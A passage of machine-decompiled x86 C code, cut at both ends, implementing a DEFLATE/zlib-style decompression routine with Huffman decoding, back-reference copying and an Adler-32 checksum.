				signed int _t1039;
				signed int _t1041;
				signed int _t1044;
				signed int _t1046;
				signed int _t1051;
				signed int _t1060;
				signed int _t1066;
				int _t1067;
				signed int _t1075;
				signed int _t1077;
				signed int _t1078;
				signed int _t1079;
				signed int _t1080;
				signed int _t1082;
				signed int _t1083;
				signed int _t1084;
				signed int _t1085;
				signed int _t1087;
				signed int _t1088;
				signed int _t1090;
				signed int _t1091;
				signed int _t1093;
				signed int _t1094;
				signed int _t1095;
				signed int _t1096;
				signed int _t1112;
				signed int _t1113;
				void* _t1114;
				intOrPtr _t1115;
				signed char* _t1116;
				signed int _t1117;
				signed int _t1118;
				signed int _t1119;
				signed int _t1121;
				signed int _t1123;
				signed int _t1124;
				signed int _t1126;
				signed int _t1127;
				signed char _t1128;
				signed int _t1135;
				signed int _t1137;
				signed int _t1138;
				signed int* _t1139;
				signed int _t1141;
				unsigned int _t1145;
				signed int _t1146;
				void* _t1157;
				void* _t1158;
				signed char _t1161;
				signed int _t1163;
				void* _t1164;
				signed int _t1165;
				signed int _t1166;
				signed char _t1169;
				unsigned int _t1170;
				signed char _t1176;
				signed int _t1177;
				signed int _t1185;
				signed int* _t1187;
				signed int _t1191;
				signed char _t1194;
				signed int _t1195;
				void* _t1197;
				signed int _t1198;
				signed int _t1199;
				signed char _t1200;
				signed int _t1201;
				signed int _t1202;
				signed char _t1203;
				int _t1205;
				intOrPtr* _t1208;
				signed char _t1216;
				signed int _t1219;
				signed int* _t1221;
				signed int _t1222;
				signed char _t1229;
				signed int _t1232;
				signed char _t1233;
				signed char _t1234;
				void* _t1239;
				void* _t1244;
				intOrPtr _t1245;
				signed int _t1247;
				signed int _t1248;
				signed int _t1249;
				signed int _t1250;
				signed char _t1251;
				int _t1253;
				signed int _t1256;
				signed char _t1263;
				signed int _t1266;
				signed int _t1267;
				signed char _t1270;
				signed char _t1271;
				signed int _t1274;
				void* _t1275;
				signed int _t1277;
				signed int _t1279;
				void* _t1288;
				signed int _t1291;
				void* _t1296;
				signed int _t1299;
				signed int _t1301;
				int* _t1302;
				unsigned int _t1303;
				signed int _t1304;
				void* _t1305;
				int _t1310;
				signed int _t1315;
				signed int _t1317;
				signed int _t1320;
				unsigned int _t1321;
				char* _t1322;
				signed int _t1326;
				int* _t1350;
				signed int _t1351;
				signed int* _t1352;
				signed int _t1355;
				signed int _t1358;
				intOrPtr _t1359;
				void* _t1363;
				signed int _t1364;
				signed int _t1365;
				void* _t1366;
				void* _t1367;
				void* _t1368;
				void* _t1369;
				void* _t1370;
				void* _t1371;
				void* _t1372;
				signed int _t1373;
				int _t1374;
				signed int _t1375;
				int* _t1376;
				void* _t1377;
				void* _t1378;
				void* _t1379;
				void* _t1384;
				void* _t1385;

				_t1288 = __edx;
				_v16 = __edx;
				_t1113 = _t1112 | 0xffffffff;
				_v76 = __edx;
				_t1363 = _a12;
				_v36 =  *_a4 + __edx;
				_t1350 = __ecx;
				_v20 = _t1113;
				_v64 = __ecx;
				_t759 =  *_a16;
				_v32 = _t1363;
				_v60 = _t759 + _t1363;
				_t1135 = _a20 & 0x00000004;
				_v52 = _t1135;
				if(_t1135 == 0) {
					_t16 = _t1363 - 1; // 0x7
					_t1137 = _t16 + _t759 - _a8;
					__eflags = _t1137;
					_v68 = _t1137;
				} else {
					_t1137 = _t1113;
					_v68 = _t1113;
				}
				_t18 = _t1137 + 1; // 0x8
				if((_t1137 & _t18) != 0 || _t1363 < _a8) {
					 *_a16 =  *_a16 & 0x00000000;
					_t763 = _a4;
					 *_t763 =  *_t763 & 0x00000000;
					__eflags =  *_t763;
					_t764 = 0xfffffffd;
					return _t764;
				} else {
					_v28 = _v28 & 0x00000000;
					_t1364 = _t1350[1];
					_t1138 = _t1350[9];
					_v8 = _t1350[0xe];
					_v44 = _t1350[8];
					_v56 = _t1350[0xa];
					_v72 = _t1350[0xf];
					_t769 =  *_t1350;
					_v48 = _t1364;
					_v12 = _t1138;
					_v24 = 1;
					_v80 = 0x90;
					_t1384 = _t769 - 0x18;
					if(_t1384 > 0) {
						__eflags = _t769 - 0x25;
						if(__eflags > 0) {
							_t770 = _t769 - 0x26;
							__eflags = _t770;
							if(_t770 == 0) {
								_t1139 = _v32;
								_t771 = _v60;
								L59:
								__eflags = _t1288 - _v36;
								if(_t1288 >= _v36) {
									 *_t1350 = 0x26;
									L335:
									_t772 = _v24;
									L336:
									_t1114 = 0xfffffffc;
									_t1113 =  !=  ? _t772 : _t1114;
									L337:
									_v20 = _t1113;
									if(_t1113 == _t772 || _t1113 == 0xfffffffc) {
										L343:
										_t1350[1] = _t1364;
										asm("bts ecx, esi");
										_t774 =  >=  ? 0 : 0;
										_t1141 = 0 ^ _t774;
										_t775 =  >=  ? _t1141 : _t774;
										_t1350[8] = _v44;
										_t1350[9] = _v12;
										_t1350[0xa] = _v56;
										_t1350[0xf] = _v72;
										_t1350[0xe] = _t1141 - 0x00000001 & _v8;
										 *_a4 = _t1288 - _v76;
										_t782 = _v32 - _a12;
										_v32 = _t782;
										 *_a16 = _t782;
										if((_a20 & 0x00000009) == 0 || _t1113 < 0) {
											L360:
											return _t1113;
										} else {
											_a4 = 0x15b0;
											_t1291 = _t782 % _a4;
											_t1145 = _t1350[7];
											_t1365 = _t1145 & 0x0000ffff;
											_t1146 = _t1145 >> 0x10;
											_v68 = _t1291;
											if(_v32 == 0) {
												L357:
												_t1350[7] = (_t1146 << 0x10) + _t1365;
												if(_t1113 == 0 && (_a20 & 0x00000001) != 0) {
													_t785 = 0xfffffffe;
													_t1113 =  !=  ? _t785 : _t1113;
												}
												goto L360;
											}
											_t1351 = 0xfff1;
											do {
												_t786 = 0;
												_a16 = 0;
												if(_t1291 <= 7) {
													L351:
													if(_t786 >= _t1291) {
														goto L355;
													}
													_t1116 = _a12;
													_t1296 = _t1291 - _t786;
													do {
														_t1365 = _t1365 + ( *_t1116 & 0x000000ff);
														_t1116 =  &(_t1116[1]);
														_t1146 = _t1146 + _t1365;
														_t1296 = _t1296 - 1;
													} while (_t1296 != 0);
													_a12 = _t1116;
													goto L355;
												}
												_t1352 = _a16;
												_push(7);
												_t795 = 0 - _a12;
												_v80 = _t795;
												_t1115 = _t795;
												do {
													_t1352 =  &(_t1352[2]);
													_t1366 = _t1365 + ( *_a12 & 0x000000ff);
													_t1367 = _t1366 + (_a12[1] & 0x000000ff);
													_t1368 = _t1367 + (_a12[2] & 0x000000ff);
													_t1369 = _t1368 + (_a12[3] & 0x000000ff);
													_t1370 = _t1369 + (_a12[4] & 0x000000ff);
													_t1371 = _t1370 + (_a12[5] & 0x000000ff);
													_t1372 = _t1371 + (_a12[6] & 0x000000ff);
													_t1365 = _t1372 + (_a12[7] & 0x000000ff);
													_t813 =  &(_a12[8]);
													_t1146 = _t1146 + _t1366 + _t1367 + _t1368 + _t1369 + _t1370 + _t1371 + _t1372 + _t1365;
													_a12 = _t813;
												} while ( &(_t813[_t1115]) < _t1291);
												_a16 = _t1352;
												_t786 = _t1352;
												_t1351 = 0xfff1;
												goto L351;
												L355:
												_t1365 = _t1365 % _t1351;
												_t792 = _v32 - _v68;
												_t1146 = _t1146 % _t1351;
												_t1291 = _a4;
												_v32 = _t792;
												_v68 = _t1291;
											} while (_t792 != 0);
											_t1113 = _v20;
											_t1350 = _v64;
											goto L357;
										}
									} else {
										L339:
										_t815 = _v76;
										while(_t1288 > _t815) {
											__eflags = _t1364 - 8;
											if(_t1364 < 8) {
												goto L343;
											}
											_t1288 = _t1288 - 1;
											_t1364 = _t1364 - 8;
											__eflags = _t1364;
										}
										goto L343;
									}
								}
								_t1373 = _v12;
								_t816 = _t771 - _t1139;
								_t1157 = _v36 - _t1288;
								__eflags = _t816 - _t1157;
								_t1158 =  <  ? _t816 : _t1157;
								__eflags = _t1158 - _t1373;
								_t1374 =  <  ? _t1158 : _t1373;
								memcpy(_v32, _t1288, _t1374);
								_t1379 = _t1379 + 0xc;
								_t1288 = _v16 + _t1374;
								_t1139 = _v32 + _t1374;
								_t819 = _v12 - _t1374;
								__eflags = _t819;
								_v16 = _t1288;
								_t1364 = _v48;
								_v32 = _t1139;
								_v12 = _t819;
								L61:
								__eflags = _t819;
								if(_t819 != 0) {
									L279:
									_t771 = _v60;
									__eflags = _t1139 - _t771;
									if(_t1139 < _t771) {
										goto L59;
									}
									_t1113 = 2;
									_v20 = _t1113;
									 *_t1350 = 9;
									goto L339;
								}
								L62:
								__eflags = _t1350[5] & 0x00000001;
								if((_t1350[5] & 0x00000001) != 0) {
									__eflags = _t1364 - (_t1364 & 0x00000007);
									if(_t1364 >= (_t1364 & 0x00000007)) {
										_t1117 = _v8;
										L311:
										_t822 = _v76;
										_t1161 = _t1364 & 0x00000007;
										_t1118 = _t1117 >> _t1161;
										_t1364 = _t1364 - _t1161;
										__eflags = _t1288 - _t822;
										if(_t1288 <= _t822) {
											L315:
											_t823 = _t1364;
											asm("bts edx, eax");
											__eflags = _t823 - 0x20;
											_t1163 =  >=  ? 0 : 0;
											_t1299 = 0 ^ _t1163;
											__eflags = _t823 - 0x40;
											_t1164 =  >=  ? _t1299 : _t1163;
											_t1119 = _t1118 & _t1299 - 0x00000001;
											__eflags = _a20 & 0x00000001;
											_v8 = _t1119;
											if((_a20 & 0x00000001) == 0) {
												L332:
												_t1288 = _v16;
												L333:
												_t1113 = 0;
												 *_t1350 = 0x22;
												L18:
												_t772 = _v24;
												goto L337;
											}
											_t1165 = 0;
											__eflags = 0;
											L317:
											_v12 = _t1165;
											__eflags = _t1165 - 4;
											if(_t1165 >= 4) {
												goto L332;
											}
											__eflags = _t1364;
											if(_t1364 == 0) {
												_t1288 = _v16;
												L327:
												__eflags = _t1288 - _v36;
												if(_t1288 >= _v36) {
													 *_t1350 = 0x2a;
													goto L335;
												}
												_t1166 =  *_t1288 & 0x000000ff;
												_t1301 = _t1288 + 1;
												__eflags = _t1301;
												_v16 = _t1301;
												L329:
												_t1350[4] = _t1350[4] << 0x00000008 | _t1166;
												_t1165 = _v12 + 1;
												goto L317;
											}
											__eflags = _t1364 - 8;
											if(_t1364 >= 8) {
												L324:
												_t1166 = _t1119 & 0x000000ff;
												_t1119 = _t1119 >> 8;
												_t1364 = _t1364 - 8;
												_v8 = _t1119;
												goto L329;
											}
											_t1288 = _v16;
											while(1) {
												L322:
												__eflags = _t1288 - _v36;
												if(_t1288 >= _v36) {
													break;
												}
												_t828 = ( *_t1288 & 0x000000ff) << _t1364;
												_t1288 = _t1288 + 1;
												_t1119 = _t1119 | _t828;
												_v16 = _t1288;
												_t1364 = _t1364 + 8;
												_v8 = _t1119;
												__eflags = _t1364 - 8;
												if(_t1364 < 8) {
													continue;
												}
												goto L324;
											}
											 *_t1350 = 0x29;
											goto L335;
										} else {
											goto L312;
										}
										while(1) {
											L312:
											__eflags = _t1364 - 8;
											if(_t1364 < 8) {
												break;
											}
											_t1288 = _t1288 - 1;
											_t1364 = _t1364 - 8;
											__eflags = _t1288 - _t822;
											if(_t1288 > _t822) {
												continue;
											}
											break;
										}
										_v16 = _t1288;
										goto L315;
									} else {
										goto L306;
									}
									while(1) {
										L306:
										__eflags = _t1288 - _v36;
										if(_t1288 >= _v36) {
											break;
										}
										_t1169 = _t1364;
										_t1364 = _t1364 + 8;
										_t830 = ( *_t1288 & 0x000000ff) << _t1169;
										_t1288 = _t1288 + 1;
										_t1117 = _v8 | _t830;
										_v16 = _t1288;
										_v8 = _t1117;
										__eflags = _t1364 - (_t1364 & 0x00000007);
										if(_t1364 < (_t1364 & 0x00000007)) {
											continue;
										}
										goto L311;
									}
									 *_t1350 = 0x20;
									goto L335;
								}
								L63:
								_t1170 = _v8;
								L66:
								__eflags = _t1364 - 3;
								if(_t1364 < 3) {
									L64:
									__eflags = _t1288 - _v36;
									if(_t1288 >= _v36) {
										 *_t1350 = 3;
										goto L335;
									}
									_t834 = ( *_t1288 & 0x000000ff) << _t1364;
									_t1288 = _t1288 + 1;
									_t1170 = _v8 | _t834;
									_v16 = _t1288;
									_v8 = _t1170;
									_t1364 = _t1364 + 8;
									__eflags = _t1364;
									goto L66;
								}
								_t1364 = _t1364 - 3;
								_t836 = _t1170 & 0x00000007;
								_t1350[5] = _t836;
								_t837 = _t836 >> 1;
								__eflags = _t837;
								_v8 = _t1170 >> 3;
								_v48 = _t1364;
								_t1350[6] = _t837;
								if(_t837 == 0) {
									L253:
									__eflags = _t1364 - (_t1364 & 0x00000007);
									if(_t1364 < (_t1364 & 0x00000007)) {
										L251:
										__eflags = _t1288 - _v36;
										if(_t1288 >= _v36) {
											 *_t1350 = 5;
											goto L335;
										}
										_t841 = ( *_t1288 & 0x000000ff) << _t1364;
										_t1288 = _t1288 + 1;
										_v8 = _v8 | _t841;
										_t1364 = _t1364 + 8;
										__eflags = _t1364;
										_v16 = _t1288;
										goto L253;
									}
									_t1176 = _t1364 & 0x00000007;
									_t843 = _v8 >> _t1176;
									_t1364 = _t1364 - _t1176;
									_v8 = _t843;
									_t1177 = 0;
									__eflags = 0;
									_v48 = _t1364;
									L255:
									_v12 = _t1177;
									__eflags = _t1177 - 4;
									if(_t1177 >= 4) {
										_v12 = (_t1350[0xa48] & 0x000000ff) << 0x00000008 | _t1350[0xa48] & 0x000000ff;
										_t819 = _v12;
										__eflags = _t819 - (((_t1350[0xa48] & 0x000000ff) << 0x00000008 | _t1350[0xa48] & 0x000000ff) ^ 0x0000ffff);
										if(_t819 != (((_t1350[0xa48] & 0x000000ff) << 0x00000008 | _t1350[0xa48] & 0x000000ff) ^ 0x0000ffff)) {
											L304:
											_v20 = _t1113;
											 *_t1350 = 0x27;
											goto L339;
										}
										_t1139 = _v32;
										L267:
										__eflags = _t819;
										if(_t819 == 0) {
											goto L62;
										}
										__eflags = _t1364;
										if(_t1364 == 0) {
											goto L61;
										}
										__eflags = _t1364 - 8;
										if(_t1364 >= 8) {
											_t1185 = _v8;
											L274:
											_t846 = _t1185 & 0x000000ff;
											_t1364 = _t1364 - 8;
											_v44 = _t846;
											_v8 = _t1185 >> 8;
											_v48 = _t1364;
											L276:
											_t1187 = _v32;
											__eflags = _t1187 - _v60;
											if(_t1187 >= _v60) {
												_t1113 = 2;
												_v20 = _t1113;
												 *_t1350 = 0x34;
												goto L339;
											}
											 *_t1187 = _t846;
											_t1139 =  &(_t1187[0]);
											_t819 = _v12 - 1;
											_v32 = _t1139;
											_v12 = _t819;
											goto L267;
										} else {
											goto L270;
										}
										while(1) {
											L270:
											__eflags = _t1288 - _v36;
											if(_t1288 >= _v36) {
												break;
											}
											_t849 = ( *_t1288 & 0x000000ff) << _t1364;
											_t1288 = _t1288 + 1;
											_t1364 = _t1364 + 8;
											_t1185 = _v8 | _t849;
											_v16 = _t1288;
											_v8 = _t1185;
											__eflags = _t1364 - 8;
											if(_t1364 < 8) {
												continue;
											}
											goto L274;
										}
										 *_t1350 = 0x33;
										goto L335;
									}
									__eflags = _t1364;
									if(_t1364 == 0) {
										L262:
										__eflags = _t1288 - _v36;
										if(_t1288 >= _v36) {
											 *_t1350 = 7;
											goto L335;
										}
										_t850 =  *_t1288;
										_t1288 = _t1288 + 1;
										__eflags = _t1288;
										 *(_t1177 +  &(_t1350[0xa48])) = _t850;
										_t843 = _v8;
										_v16 = _t1288;
										L264:
										_t1177 = _t1177 + 1;
										goto L255;
									}
									__eflags = _t1364 - 8;
									if(_t1364 >= 8) {
										L261:
										 *(_t1177 +  &(_t1350[0xa48])) = _t843;
										_t843 = _t843 >> 8;
										_t1364 = _t1364 - 8;
										_v8 = _t843;
										_v48 = _t1364;
										goto L264;
									} else {
										goto L258;
									}
									while(1) {
										L258:
										__eflags = _t1288 - _v36;
										if(_t1288 >= _v36) {
											break;
										}
										_t852 = ( *_t1288 & 0x000000ff) << _t1364;
										_t1288 = _t1288 + 1;
										_v8 = _v8 | _t852;
										_t1364 = _t1364 + 8;
										_v16 = _t1288;
										__eflags = _t1364 - 8;
										if(_t1364 < 8) {
											continue;
										}
										_t1177 = _v12;
										_t843 = _v8;
										goto L261;
									}
									 *_t1350 = 6;
									goto L335;
								}
								__eflags = _t837 - 3;
								if(_t837 == 3) {
									L298:
									_v20 = _t1113;
									 *_t1350 = 0xa;
									goto L339;
								}
								__eflags = _t837 - _v24;
								if(_t837 != _v24) {
									_t1191 = 0;
									__eflags = 0;
									L72:
									_v12 = _t1191;
									__eflags = _t1191 - 3;
									if(_t1191 < 3) {
										L83:
										_t146 = _t1191 + 0x411014; // 0x40505
										_t853 =  *_t146;
										_v28 = _t853;
										__eflags = _t1364 - _t853;
										if(_t1364 < _t853) {
											L81:
											__eflags = _t1288 - _v36;
											if(_t1288 >= _v36) {
												 *_t1350 = 0xb;
												goto L335;
											}
											_t855 = ( *_t1288 & 0x000000ff) << _t1364;
											_t1288 = _t1288 + 1;
											_v8 = _v8 | _t855;
											_t1364 = _t1364 + 8;
											__eflags = _t1364;
											_t1191 = _v12;
											_v16 = _t1288;
											goto L83;
										}
										_t1302 =  &(_t1350[_t1191]);
										_t1302[0xb] = (_v24 << _v28) - 0x00000001 & _v8;
										_t155 = _v12 + 0x411014; // 0x40505
										_t1194 =  *_t155;
										_v8 = _v8 >> _t1194;
										_t1364 = _t1364 - _t1194;
										_t1195 = _v12;
										_v48 = _t1364;
										_t1302[0xb] = _t1302[0xb] +  *((intOrPtr*)(0x411a48 + _t1195 * 4));
										_t1191 = _t1195 + 1;
										_t1288 = _v16;
										goto L72;
									}
									memset( &(_t1350[0x6e0]), 0, 0x120);
									_t1303 = _v8;
									_t1379 = _t1379 + 0xc;
									_t864 = 0;
									__eflags = 0;
									L74:
									_v12 = _t864;
									__eflags = _t864 - _t1350[0xd];
									if(_t864 >= _t1350[0xd]) {
										_t1350[0xd] = 0x13;
										L86:
										_t865 = _t1350[6];
										__eflags = _t865;
										if(_t865 < 0) {
											L153:
											_t1288 = _v16;
											L154:
											_t1197 = _v36 - _t1288;
											__eflags = _t1197 - 4;
											if(_t1197 < 4) {
												L173:
												__eflags = _t1364 - 0xf;
												if(_t1364 >= 0xf) {
													L178:
													_t1198 = _v8;
													L179:
													_t868 =  *((short*)(_t1350 + 0x160 + (_t1198 & 0x000003ff) * 2));
													_v12 = _t868;
													__eflags = _t868;
													if(_t868 < 0) {
														_t1199 = 0xa;
														do {
															_v12 =  !_v12;
															_t872 = (_v8 >> _t1199 & 0x00000001) + _v12;
															_t1199 = _t1199 + 1;
															_t873 =  *((short*)(_t1350 + 0x960 + _t872 * 2));
															_v12 = _t873;
															__eflags = _t873;
														} while (_t873 < 0);
														L191:
														_v8 = _v8 >> _t1199;
														_t1364 = _t1364 - _t1199;
														__eflags = _t873 - 0x100;
														if(_t873 >= 0x100) {
															L198:
															_t874 = _t873 & 0x000001ff;
															_v12 = _t874;
															__eflags = _t874 - 0x100;
															if(_t874 == 0x100) {
																goto L62;
															}
															_t875 = _t874 * 4 - 0x404;
															_t1200 =  *(_t875 + 0x411020);
															_v56 = _t1200;
															_v12 =  *((intOrPtr*)(_t875 + 0x411a58));
															__eflags = _t1200;
															if(_t1200 == 0) {
																L205:
																__eflags = _t1364 - 0xf;
																if(_t1364 >= 0xf) {
																	L210:
																	_t1201 = _v8;
																	L211:
																	_t879 =  *((short*)(_t1350 + 0xf00 + (_t1201 & 0x000003ff) * 2));
																	_v28 = _t879;
																	__eflags = _t879;
																	if(_t879 < 0) {
																		_t1121 = _v28;
																		_t1321 = _v8;
																		_t1202 = 0xa;
																		do {
																			_t883 = (_t1321 >> _t1202 & 0x00000001) +  !_t1121;
																			_t1202 = _t1202 + 1;
																			_t1121 =  *((short*)(_t1350 + 0x1700 + _t883 * 2));
																			__eflags = _t1121;
																		} while (_t1121 < 0);
																		_t1288 = _v16;
																		_v28 = _t1121;
																		_t1113 = _t1121 | 0xffffffff;
																		__eflags = _t1113;
																		_t884 = _v28;
																		L224:
																		_v8 = _v8 >> _t1202;
																		_t1364 = _t1364 - _t1202;
																		_t1203 =  *(0x4110a0 + _t884 * 4);
																		_t885 =  *((intOrPtr*)(0x411120 + _t884 * 4));
																		_v56 = _t1203;
																		_v44 = _t885;
																		__eflags = _t1203;
																		if(_t1203 == 0) {
																			L230:
																			_t1205 = _v32 - _a8;
																			_v72 = _t1205;
																			__eflags = _t885 - _t1205;
																			if(_t885 <= _t1205) {
																				L232:
																				_t1350 = _v64;
																				_t1208 = (_t1205 - _t885 & _v68) + _a8;
																				__eflags = _v32 - _t1208;
																				_t887 =  >  ? _v32 : _t1208;
																				_t888 = ( >  ? _v32 : _t1208) + _v12;
																				__eflags = ( >  ? _v32 : _t1208) + _v12 - _v60;
																				if(( >  ? _v32 : _t1208) + _v12 <= _v60) {
																					_t889 = _v12;
																					__eflags = _t889 - 9;
																					if(_t889 < 9) {
																						L246:
																						_t1322 = _v32;
																						do {
																							_t890 =  *_t1208;
																							_t1208 = _t1208 + 3;
																							 *_t1322 = _t890;
																							 *((char*)(_t1322 + 1)) =  *((intOrPtr*)(_t1208 - 2));
																							 *((char*)(_t1322 + 2)) =  *((intOrPtr*)(_t1208 - 1));
																							_t1322 = _t1322 + 3;
																							_t894 = _v12 - 3;
																							_v12 = _t894;
																							__eflags = _t894 - 2;
																						} while (_t894 > 2);
																						_v32 = _t1322;
																						__eflags = _t894;
																						if(_t894 <= 0) {
																							goto L153;
																						}
																						 *_t1322 =  *_t1208;
																						_t934 = _v12;
																						__eflags = _t934 - 1;
																						if(_t934 <= 1) {
																							L245:
																							_v32 = _t1322 + _t934;
																							goto L153;
																						}
																						L244:
																						 *((char*)(_t1322 + 1)) =  *((intOrPtr*)(_t1208 + 1));
																						_t934 = _v12;
																						goto L245;
																					}
																					__eflags = _t889 - _v44;
																					if(_t889 > _v44) {
																						goto L246;
																					}
																					_t1126 = _v32;
																					_t1326 = (_t889 & 0xfffffff8) + _t1208;
																					__eflags = _t1326;
																					do {
																						 *_t1126 =  *_t1208;
																						_t937 =  *((intOrPtr*)(_t1208 + 4));
																						_t1208 = _t1208 + 8;
																						 *((intOrPtr*)(_t1126 + 4)) = _t937;
																						_t1126 = _t1126 + 8;
																						__eflags = _t1208 - _t1326;
																					} while (_t1208 < _t1326);
																					_t939 = _v12 & 0x00000007;
																					_v32 = _t1126;
																					_t1113 = _t1126 | 0xffffffff;
																					_v12 = _t939;
																					__eflags = _t939 - 3;
																					if(_t939 >= 3) {
																						goto L246;
																					}
																					__eflags = _t939;
																					if(_t939 == 0) {
																						goto L153;
																					}
																					_t1322 = _v32;
																					 *_t1322 =  *_t1208;
																					_t934 = _v12;
																					__eflags = _t934 - 1;
																					if(_t934 <= 1) {
																						goto L245;
																					}
																					goto L244;
																				}
																				_t1138 = _v12;
																				L234:
																				_t941 = _t1138;
																				_t1138 = _t1138 - 1;
																				_v12 = _t1138;
																				__eflags = _t941;
																				if(_t941 == 0) {
																					goto L153;
																				}
																				L235:
																				__eflags = _v32 - _v60;
																				if(_v32 >= _v60) {
																					_t1113 = 2;
																					_v20 = _t1113;
																					 *_t1350 = 0x35;
																					goto L339;
																				}
																				_v32 = _v32 + 1;
																				_v72 = _v72 + 1;
																				 *_v32 =  *((intOrPtr*)((_v72 - _v44 & _v68) + _a8));
																				_t1350 = _v64;
																				goto L234;
																			}
																			__eflags = _a20 & 0x00000004;
																			if((_a20 & 0x00000004) != 0) {
																				L296:
																				_v20 = _t1113;
																				 *_t1350 = 0x25;
																				goto L339;
																			}
																			goto L232;
																		}
																		L228:
																		__eflags = _t1364 - _t1203;
																		if(_t1364 < _t1203) {
																			L226:
																			__eflags = _t1288 - _v36;
																			if(_t1288 >= _v36) {
																				 *_t1350 = 0x1b;
																				goto L335;
																			}
																			_t948 = ( *_t1288 & 0x000000ff) << _t1364;
																			_t1288 = _t1288 + 1;
																			_v8 = _v8 | _t948;
																			_t1364 = _t1364 + 8;
																			__eflags = _t1364;
																			_t1203 = _v56;
																			_v16 = _t1288;
																			goto L228;
																		}
																		_t1364 = _t1364 - _t1203;
																		_v8 = _v8 >> _t1203;
																		_t534 =  &_v44;
																		 *_t534 = _v44 + ((_v24 << _t1203) - 0x00000001 & _v8);
																		__eflags =  *_t534;
																		_t885 = _v44;
																		goto L230;
																	}
																	_t1202 = _t879 >> 9;
																	_t884 = _t879 & 0x000001ff;
																	goto L224;
																}
																__eflags = _v36 - _t1288 - 2;
																if(_v36 - _t1288 >= 2) {
																	_t502 = _t1288 + 1; // 0x83c84d8d
																	_t1201 = _v8 | ( *_t502 & 0x000000ff) << _t1364 + 0x00000008 | ( *_v16 & 0x000000ff) << _t1364;
																	_t1288 = _v16 + 2;
																	_v8 = _t1201;
																	_v16 = _t1288;
																	_t1364 = _t1364 + 0x10;
																	goto L211;
																}
																L207:
																_t960 =  *((short*)(_t1350 + 0xf00 + (_v8 & 0x000003ff) * 2));
																_v40 = _t960;
																__eflags = _t960;
																if(_t960 < 0) {
																	__eflags = _t1364 - 0xa;
																	if(_t1364 <= 0xa) {
																		L217:
																		__eflags = _t1288 - _v36;
																		if(_t1288 >= _v36) {
																			 *_t1350 = 0x1a;
																			goto L335;
																		}
																		_t962 = ( *_t1288 & 0x000000ff) << _t1364;
																		_t1288 = _t1288 + 1;
																		_t1364 = _t1364 + 8;
																		_t1201 = _v8 | _t962;
																		_v16 = _t1288;
																		_v8 = _t1201;
																		__eflags = _t1364 - 0xf;
																		if(_t1364 < 0xf) {
																			goto L207;
																		}
																		goto L211;
																	}
																	_t1216 = 0xa;
																	_v28 = _t1216;
																	while(1) {
																		_t1219 =  *((short*)(_t1350 + 0x1700 + ((_v8 >> _t1216 & _v24) +  !_v40) * 2));
																		_t968 = _v28 + 1;
																		_v40 = _t1219;
																		_v28 = _t968;
																		__eflags = _t1219;
																		if(_t1219 >= 0) {
																			goto L210;
																		}
																		_t1216 = _v28;
																		__eflags = _t1364 - _t968 + 1;
																		if(_t1364 >= _t968 + 1) {
																			continue;
																		}
																		goto L217;
																	}
																	goto L210;
																}
																_t970 = _t960 >> 9;
																__eflags = _t970;
																if(_t970 == 0) {
																	goto L217;
																}
																__eflags = _t1364 - _t970;
																if(_t1364 < _t970) {
																	goto L217;
																}
																goto L210;
															}
															L203:
															__eflags = _t1364 - _t1200;
															if(_t1364 < _t1200) {
																L201:
																__eflags = _t1288 - _v36;
																if(_t1288 >= _v36) {
																	 *_t1350 = 0x19;
																	goto L335;
																}
																_t972 = ( *_t1288 & 0x000000ff) << _t1364;
																_t1288 = _t1288 + 1;
																_v8 = _v8 | _t972;
																_t1364 = _t1364 + 8;
																__eflags = _t1364;
																_t1200 = _v56;
																_v16 = _t1288;
																goto L203;
															}
															_t1364 = _t1364 - _t1200;
															_v8 = _v8 >> _t1200;
															_t474 =  &_v12;
															 *_t474 = _v12 + ((_v24 << _t1200) - 0x00000001 & _v8);
															__eflags =  *_t474;
															goto L205;
														}
														L194:
														_t1221 = _v32;
														__eflags = _t1221 - _v60;
														if(_t1221 >= _v60) {
															_t1113 = 2;
															_v20 = _t1113;
															 *_t1350 = 0x18;
															goto L339;
														}
														 *_t1221 = _t873;
														_t1222 =  &(_t1221[0]);
														__eflags = _t1222;
														L196:
														_v32 = _t1222;
														goto L154;
													}
													_t1199 = _t868 >> 9;
													_t873 = _t868 & 0x000001ff;
													_v12 = _t873;
													goto L191;
												}
												__eflags = _t1197 - 2;
												if(_t1197 >= 2) {
													_t1198 = _v8 | ( *(_t1288 + 1) & 0x000000ff) << _t1364 + 0x00000008 | ( *_v16 & 0x000000ff) << _t1364;
													_t1288 = _v16 + 2;
													_v8 = _t1198;
													_v16 = _t1288;
													_t1364 = _t1364 + 0x10;
													goto L179;
												}
												L175:
												_t900 =  *((short*)(_t1350 + 0x160 + (_v8 & 0x000003ff) * 2));
												_v40 = _t900;
												__eflags = _t900;
												if(_t900 < 0) {
													__eflags = _t1364 - 0xa;
													if(_t1364 <= 0xa) {
														L185:
														__eflags = _t1288 - _v36;
														if(_t1288 >= _v36) {
															 *_t1350 = 0x17;
															goto L335;
														}
														_t902 = ( *_t1288 & 0x000000ff) << _t1364;
														_t1288 = _t1288 + 1;
														_t1364 = _t1364 + 8;
														_t1198 = _v8 | _t902;
														_v16 = _t1288;
														_v8 = _t1198;
														__eflags = _t1364 - 0xf;
														if(_t1364 < 0xf) {
															goto L175;
														}
														goto L179;
													}
													_t1229 = 0xa;
													_v28 = _t1229;
													while(1) {
														_t1232 =  *((short*)(_t1350 + 0x960 + ((_v8 >> _t1229 & _v24) +  !_v40) * 2));
														_t908 = _v28 + 1;
														_v40 = _t1232;
														_v28 = _t908;
														__eflags = _t1232;
														if(_t1232 >= 0) {
															goto L178;
														}
														_t1229 = _v28;
														__eflags = _t1364 - _t908 + 1;
														if(_t1364 >= _t908 + 1) {
															continue;
														}
														goto L185;
													}
													goto L178;
												}
												_t910 = _t900 >> 9;
												__eflags = _t910;
												if(_t910 == 0) {
													goto L185;
												}
												__eflags = _t1364 - _t910;
												if(_t1364 < _t910) {
													goto L185;
												}
												goto L178;
											}
											_t1113 = 0xffffffff;
											__eflags = _v60 - _v32 - 2;
											if(_v60 - _v32 < 2) {
												goto L173;
											}
											__eflags = _t1364 - 0xf;
											if(_t1364 >= 0xf) {
												_t913 = _v8;
											} else {
												_t913 = _v8 | (( *(_t1288 + 1) & 0x000000ff) << 0x00000008 |  *_v16 & 0x000000ff) << _t1364;
												_t1288 = _v16 + 2;
												_v8 = _t913;
												_v16 = _t1288;
												_t1364 = _t1364 + 0x10;
											}
											_t915 =  *((short*)(_t1350 + 0x160 + (_t913 & 0x000003ff) * 2));
											_v12 = _t915;
											__eflags = _t915;
											if(_t915 < 0) {
												_t1233 = 0xa;
												do {
													_v12 =  !_v12;
													_t919 = (_v8 >> _t1233 & 0x00000001) + _v12;
													_t1233 = _t1233 + 1;
